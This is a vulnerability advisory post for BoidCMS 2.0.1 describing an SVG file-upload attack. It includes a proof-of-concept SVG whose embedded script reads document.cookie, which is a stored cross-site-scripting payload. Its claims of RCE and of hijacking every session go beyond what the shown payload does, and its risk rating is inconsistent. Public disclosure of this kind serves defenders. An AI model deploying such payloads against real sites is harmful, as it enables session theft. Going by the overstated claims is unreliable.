BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING

2023.10.13
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING ## Author: nu11secur1ty ## Date: 10/13/2023 ## Vendor: https://boidcms.github.io/#/ ## Software: https://github.com/BoidCMS/BoidCMS/releases/tag/v2.0.1 ## Reference: https://portswigger.net/web-security/file-upload ## LAB: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: This attack needs two attackers to be complete. The first one has credentials and he will be using them to upload a malicious dirty SVG file, when he is ready he just quits the application and he will send the malicious URL to the second attacker. When the second attacker has this URL he can be using it to access EVERY Session of the EVERY user of this system. This will be stopped when the real admin finds this malicious file, but it will be too late for all users of this system. This attack is called TMITM-Two men in the middle! STATUS: HIGH- Vulnerability [+]Exploit: ```svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/boidcms/2023/BoidCMS-2.0.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/10/boidcms-201-fileupload-rce-phpsessid.html) ## Time spent: 01:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top